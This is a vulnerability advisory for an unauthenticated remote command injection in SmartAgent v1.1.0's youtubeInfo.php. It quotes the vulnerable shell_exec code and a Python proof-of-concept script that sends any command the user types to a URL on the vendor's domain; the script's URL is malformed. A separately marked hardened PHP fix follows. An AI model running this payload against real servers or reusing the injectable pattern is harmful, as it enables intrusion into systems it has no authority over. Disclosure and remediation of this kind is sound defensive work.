SmartAgent 1.1.0 Remote Code Execution
SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution
# Date: 01-10-2024
# Exploit Author: Alter Prime
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com
# Version: Build v1.1.0
# Tested on: Kali Linux

An unauthenticated user can access a PHP script called https://smarts-srlcom.com/youtubeInfo.php in the vulnerable web application, and a POST request carrying the vulnerable parameter "youtubeUrl" can trigger a command injection vulnerability. The script concatenates the parameter into a shell command and passes it to shell_exec() without validation or escaping.

Vulnerable code snippet from youtubeInfo.php:

"""
$youtubeUrl=$_POST["youtubeUrl"];
$command = 'youtube-dl -j ' . $youtubeUrl;
echo shell_exec($command);
"""

Steps To Reproduce:

1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit
import requests

url = "https://smarts-srlcom.com?youtubeInfo.php"
command = input("Enter the command you want to run (EX: id): ")
postdata = { "youtubeUrl": ";" + command}
response = requests.post(url, data=postdata, verify=False)
print(response.text)
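
A hardened form of the three vulnerable lines from youtubeInfo.php, as an added example that is not part of the original advisory and not vendor code. It assumes PHP 7.4 or later (array form of proc_open) and that only YouTube URLs are legitimate input; ALLOWED_HOSTS and validate_youtube_url() are hypothetical names.

```php
<?php
// Added example: hypothetical hardened replacement, not SmartAgent's own code.
// Assumption: only https URLs on these YouTube hosts are legitimate input.
const ALLOWED_HOSTS = ['www.youtube.com', 'youtube.com', 'm.youtube.com', 'youtu.be'];

function validate_youtube_url($raw): ?string
{
    if (!is_string($raw) || strlen($raw) > 2048) {
        return null;
    }
    // Reject whitespace and control characters outright.
    if (preg_match('/[\x00-\x20\x7f]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false || ($parts['scheme'] ?? '') !== 'https') {
        return null;
    }
    // No embedded credentials or custom ports; host must be on the allowlist.
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return null;
    }
    $host = strtolower($parts['host'] ?? '');
    return in_array($host, ALLOWED_HOSTS, true) ? $raw : null;
}

$url = validate_youtube_url($_POST['youtubeUrl'] ?? null);
if ($url === null) {
    http_response_code(400);
    exit('Invalid youtubeUrl');
}

// The array form of proc_open runs youtube-dl directly, with no /bin/sh in
// between, so ';', '|', '$()' and backticks in the value are never interpreted.
// '--' ends option parsing so the value cannot be read as a youtube-dl flag.
$proc = proc_open(
    ['youtube-dl', '-j', '--', $url],
    [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']],
    $pipes
);
if (!is_resource($proc)) {
    http_response_code(500);
    exit('Lookup failed');
}
$json = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$status = proc_close($proc);

if ($status !== 0 || $json === '' || $json === false) {
    http_response_code(502);
    exit('Lookup failed');
}
header('Content-Type: application/json');
echo $json;
```

This addresses the command injection only; the endpoint is still reachable without authentication unless the application adds a session check in front of it.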